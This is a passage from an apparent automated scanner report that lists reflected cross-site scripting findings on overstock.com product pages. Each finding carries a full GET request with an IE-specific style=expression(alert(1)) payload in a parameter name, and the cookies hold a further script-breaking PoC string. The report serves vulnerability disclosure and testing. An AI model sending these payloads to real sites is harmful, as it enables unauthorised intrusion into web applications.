GET /Jewelry-Watches/Sterling-Silver-Princess-CZ-Bridal-Engagement-Ring-Set/4058275/product.html?f8918"style%3d"x%3aexpression(alert(1))"7ffafd6174f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.462. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Tapered-Ring/629543/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1893f"style%3d"x%3aexpression(alert(1))"a93ff17018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1893f"style="x:expression(alert(1))"a93ff17018a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Tapered-Ring/629543/product.html?1893f"style%3d"x%3aexpression(alert(1))"a93ff17018a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.463. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-X-and-O-Diamond-Accent-Bracelet-J-K-I3/4405140/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d7b9"style%3d"x%3aexpression(alert(1))"8dc5f9a1ba6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d7b9"style="x:expression(alert(1))"8dc5f9a1ba6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-X-and-O-Diamond-Accent-Bracelet-J-K-I3/4405140/product.html?5d7b9"style%3d"x%3aexpression(alert(1))"8dc5f9a1ba6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.464. http://www.overstock.com/Jewelry-Watches/Stuhrling-Original-Mens-Othello-Skeleton-Automatic-Watch/4692564/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa75c"style%3d"x%3aexpression(alert(1))"7ee11f3f341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa75c"style="x:expression(alert(1))"7ee11f3f341 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Stuhrling-Original-Mens-Othello-Skeleton-Automatic-Watch/4692564/product.html?aa75c"style%3d"x%3aexpression(alert(1))"7ee11f3f341=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.465. http://www.overstock.com/Jewelry-Watches/Stuhrling-Original-Mens-Romeo-Automatic-Black-Strap-Watch/5109862/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac582"style%3d"x%3aexpression(alert(1))"166c3c36444 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac582"style="x:expression(alert(1))"166c3c36444 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Stuhrling-Original-Mens-Romeo-Automatic-Black-Strap-Watch/5109862/product.html?ac582"style%3d"x%3aexpression(alert(1))"166c3c36444=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.466. http://www.overstock.com/Jewelry-Watches/Timex-Kidz-Childrens-Pink-Blue-Flowers-Watch/5156959/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be60"style%3d"x%3aexpression(alert(1))"2d0b3d2fea7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7be60"style="x:expression(alert(1))"2d0b3d2fea7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Timex-Kidz-Childrens-Pink-Blue-Flowers-Watch/5156959/product.html?7be60"style%3d"x%3aexpression(alert(1))"2d0b3d2fea7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.467. http://www.overstock.com/Jewelry-Watches/Timex-Kidz-Silvertone-Flame-Digital-Watch/5141580/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b99ec"style%3d"x%3aexpression(alert(1))"8455725ffa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b99ec"style="x:expression(alert(1))"8455725ffa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Timex-Kidz-Silvertone-Flame-Digital-Watch/5141580/product.html?b99ec"style%3d"x%3aexpression(alert(1))"8455725ffa3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.468. http://www.overstock.com/Jewelry-Watches/Timex-Womens-Stainless-Steel-Two-tone-Watch/5147164/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff845"style%3d"x%3aexpression(alert(1))"cbdb4ce9bc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff845"style="x:expression(alert(1))"cbdb4ce9bc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Timex-Womens-Stainless-Steel-Two-tone-Watch/5147164/product.html?ff845"style%3d"x%3aexpression(alert(1))"cbdb4ce9bc0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.469. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Brushed-and-Polished-Beveled-Edge-Ring-7-mm/5085667/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90717"style%3d"x%3aexpression(alert(1))"61d11cd67c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90717"style="x:expression(alert(1))"61d11cd67c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Tungsten-Carbide-Brushed-and-Polished-Beveled-Edge-Ring-7-mm/5085667/product.html?90717"style%3d"x%3aexpression(alert(1))"61d11cd67c0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.470. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Grooved-Mens-Wedding-Band/3460866/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf10"style%3d"x%3aexpression(alert(1))"cf899d04c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ecf10"style="x:expression(alert(1))"cf899d04c82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Tungsten-Carbide-Grooved-Mens-Wedding-Band/3460866/product.html?ecf10"style%3d"x%3aexpression(alert(1))"cf899d04c82=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.471. http://www.overstock.com/Jewelry-Watches/Tungsten-Carbide-Mens-1-5ct-TDW-Diamond-Comfort-fit-Band-8-mm/4311094/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ecf"style%3d"x%3aexpression(alert(1))"658940b7acd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86ecf"style="x:expression(alert(1))"658940b7acd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Tungsten-Carbide-Mens-1-5ct-TDW-Diamond-Comfort-fit-Band-8-mm/4311094/product.html?86ecf"style%3d"x%3aexpression(alert(1))"658940b7acd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.472. http://www.overstock.com/Jewelry-Watches/Tungsten-with-Black-and-Blue-Carbon-Fiber-Inlay-Ring-8-mm/5162780/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff63"style%3d"x%3aexpression(alert(1))"8a89694153e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff63"style="x:expression(alert(1))"8a89694153e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Tungsten-with-Black-and-Blue-Carbon-Fiber-Inlay-Ring-8-mm/5162780/product.html?eff63"style%3d"x%3aexpression(alert(1))"8a89694153e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.473. http://www.overstock.com/Jewelry-Watches/White-Rhodium-Overlay-Cubic-Zirconia-Bridal-inspired-Rings-Set/4338561/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b10e"style%3d"x%3aexpression(alert(1))"2e4adbcb9fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3b10e"style="x:expression(alert(1))"2e4adbcb9fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/White-Rhodium-Overlay-Cubic-Zirconia-Bridal-inspired-Rings-Set/4338561/product.html?3b10e"style%3d"x%3aexpression(alert(1))"2e4adbcb9fc=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.474. http://www.overstock.com/Luggage-Bags/CalPak-Negotiator-Expandable-Soft-Messenger-Briefcase/3443091/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b68"style%3d"x%3aexpression(alert(1))"37db634ffe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85b68"style="x:expression(alert(1))"37db634ffe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Luggage-Bags/CalPak-Negotiator-Expandable-Soft-Messenger-Briefcase/3443091/product.html?85b68"style%3d"x%3aexpression(alert(1))"37db634ffe0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.475. http://www.overstock.com/Luggage-Bags/CalPak-S-Curve-Solid-18-Inch-Lightweight-Utility-Backpack/3442998/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df9cc"style%3d"x%3aexpression(alert(1))"6a8611f58b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df9cc"style="x:expression(alert(1))"6a8611f58b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
